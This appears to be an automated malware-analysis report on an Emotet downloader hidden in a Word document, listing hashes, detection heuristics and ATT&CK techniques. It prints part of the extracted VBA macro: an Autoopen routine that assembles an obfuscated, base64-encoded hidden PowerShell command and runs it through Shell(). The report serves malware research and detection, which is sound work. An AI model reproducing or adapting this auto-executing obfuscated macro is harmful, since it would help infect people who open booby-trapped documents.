Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 6a8e8e268760eec4…

MALICIOUS

Office (OLE)

98.8 KB Created: 2018-05-25 11:01:00 Authoring application: Microsoft Office Word First seen: 2018-06-14
MD5: 589d4021a9bb9046f6bdf26d13a5c4d1 SHA-1: 989c59ebbe6e424dfd6a7a8931b66904d7a2cec9 SHA-256: 6a8e8e268760eec4ff883164fc3e8563a6dcf46b4f47b22812d4a498108688b7
242 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample is a malicious Office document containing a VBA macro with an Autoopen function. This macro utilizes the Shell() function to execute a command, likely to download and run a second-stage payload. The ClamAV detection name 'Doc.Downloader.Emotet-6891475-0' strongly suggests the Emotet family and its downloader capabilities.

Heuristics 7

  • ClamAV: Doc.Downloader.Emotet-6891475-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6891475-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 19297 bytes
SHA-256: a6b3bf19de52ad33e7686f191fa3ffa5b679ce7722544c6442e460da8c8872b7
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "IsBHOtsGrB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function PFPSXQ()
On Error Resume Next
Set kLZQnT = blDSjS
cRvQCB = mXahRm + CSng(55081) + 25380 / Sin(49330 - CByte(37517) / 97746 - Round(20551)) + DVBpCs * UjQIK - (17614 + 2995 + 19167 - 6283)
Set ibHuw = ziWhIN
kTVff = QFNKu + CSng(53718) + 5303 / Sin(13404 - CByte(33755) / 44140 - Round(16745)) + SJWpWD * EhCHjK - (97656 + 12778 + 45739 - 61913)
PFPSXQ = aZBjT + XhvPEJURCOV + WDjUlArK + iZKZL + TnEpdVmQO + qIisihmKGVU + RdoiDMjKl + SbbfAS
Set pdWDmz = RMSvh
LNwpDp = wSmaZO + CSng(97485) + 63739 / Sin(99557 - CByte(92079) / 40947 - Round(59563)) + chiOPX * YFqZI - (194 + 39212 + 90875 - 37086)
End Function
Sub Autoopen()
On Error Resume Next
Set JCils = rvdYw
RQzQGF = iiZjQV + CSng(82362) + 54346 / Sin(24560 - CByte(33703) / 49380 - Round(88793)) + NlmSw * jLnSmz - (50788 + 79952 + 77571 - 48735)
mwTMhdwRzU (PFPSXQ)
Set stPRkf = VSPBui
DdvVfi = UQVSuP + CSng(75821) + 64590 / Sin(80047 - CByte(62136) / 4797 - Round(5618)) + ZffmdF * wdZhR - (17388 + 77337 + 66806 - 40698)
End Sub
Function mwTMhdwRzU(DcHwEvVuHm)
On Error Resume Next
Set UIuzXc = wpQwoc
zruFXw = sabiq + CSng(83014) + 76542 / Sin(3164 - CByte(72999) / 52953 - Round(9021)) + KMuIm * Clnnp - (12848 + 15755 + 1474 - 81771)
Set ZOjKWV = iTPhlF
DorbSX = jHDUN + CSng(41699) + 9516 / Sin(70378 - CByte(40255) / 50212 - Round(80495)) + FbXst * okLoXT - (33129 + 61709 + 81627 - 68427)
wWhsQsjSCA = Shell(auVZhhNJ + Chr(vbKeyP) + zORLjpirj + DcHwEvVuHm, vbHide)
Set PjiTd = HfqJAW
wprlAV = wzldmt + CSng(89426) + 68052 / Sin(68932 - CByte(6897) / 63590 - Round(60072)) + jFtHh * lPNDjo - (25871 + 26807 + 81705 - 66756)
End Function


Attribute VB_Name = "jfVCERuEjjv"
Function aZBjT()
On Error Resume Next
Set GcWGv = pwIkAb
WLZdhd = PKwtbB + CSng(74029) + 54594 / Sin(62474 - CByte(31294) / 35636 - Round(71863)) + MfbbA * tCozs - (57858 + 11058 + 43486 - 69133)
jfLJbQQl = "owersHeL" + "L -WinDow" + "sTyle hidde" + "n -e I" + "AAoACgAKAAi" + "AHsAMQA1AH0A" + "ewA3AD" + "EAfQB7AD"
Set QAACB = vfcit
NSsSPN = qkzdIj + CSng(92871) + 53327 / Sin(24994 - CByte(7971) / 29813 - Round(42539)) + CUPPRi * KkwzV - (58956 + 1301 + 78308 - 42358)
DRaISNPiM = "kANgB9AHsA" + "MgAwAH0AewAzAD" + "EAfQB7ADkAOAB9A" + "HsAMQA4AH0AewA" + "xADAAMgB9AH" + "sANQAyAH0A" + "ewA3ADU" + "AfQB7ADEAMA" + "AwAH0AewA"
Set aOsut = SXrTF
ibNIOq = CcAjBR + CSng(12064) + 76149 / Sin(97159 - CByte(13603) / 58171 - Round(66761)) + FHdAi * IvwsZO - (12679 + 68457 + 2390 - 40579)
XzjjodKWVYW = "1ADEAfQB7ADMA" + "MwB9AHs" + "AOAAwAH0Aew" + "AyADMAfQB7ADEAM" + "QB9AHsA"
Set NPKvTc = hqdnkU
NkzUb = MiihzF + CSng(69480) + 51594 / Sin(35050 - CByte(90235) / 64915 - Round(9680)) + MtOYM * iDTnGV - (21380 + 54962 + 53800 - 23014)
CHtXNZwQA = "MgA3AH0Ae" + "wA3ADk" + "AfQB7ADgAfQB7A" + "DYAOQB" + "9AHsANAA4AH0A" + "ewA3ADQAfQB" + "7ADUA" + "NwB9AHsANQA1A"
Set IOaXaj = czOszP
viSIWz = liwut + CSng(82288) + 46119 / Sin(23305 - CByte(73834) / 55453 - Round(15686)) + omTiv * JdvOXm - (7788 + 6700 + 84241 - 20656)
NGNAGTSmnM = "H0AewA0ADUAfQ" + "B7ADgA" + "NQB9AHsA" + "MgA0AH0AewA1ADA" + "AfQB7ADgAMwB9A"
Set sUEMRW = icjsNQ
lkkbJ = DWVNWQ + CSng(45340) + 21612 / Sin(18597 - CByte(81624) / 80283 - Round(98046)) + YtIDC * PnASF - (33272 + 30311 + 60563 - 5271)
IdUJfutA = "HsANgA2AH0Aew" + "A2ADEAfQ" + "B7ADAAfQB7ADYAM" + "AB9AHsA" + "NAAwAH0AewA5ADA" + "AfQB7ADUAOQB9AH" + "sAOQA0AH0A" + "ewAzADcAf" + "QB7ADkA" + "fQB7ADMAOQB9AH"
Set BTciij = wrqBz
UmrtA = SdhiEt + CSng(79182) + 5635 / Sin(8571 - CByte(31972) / 91808 - Round(12525)) + UYHWNQ * pXJLLV - (31415 + 36815 + 61733 - 61862)
pouowH = "sAMQAwADgAf" + "QB7ADU" + "AfQB7A" + "DkAMQB9AHsAN" + "QAzAH0AewA" + "1ADYAfQB7" + "ADEAM" + "AB9AHs" + "ANgAyAH0A"
aZBjT = jfLJbQQl + DRaISNPiM + XzjjodKWVYW + CHtXNZwQA + NGNAGTSmnM + IdUJfutA + pouowH
En
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.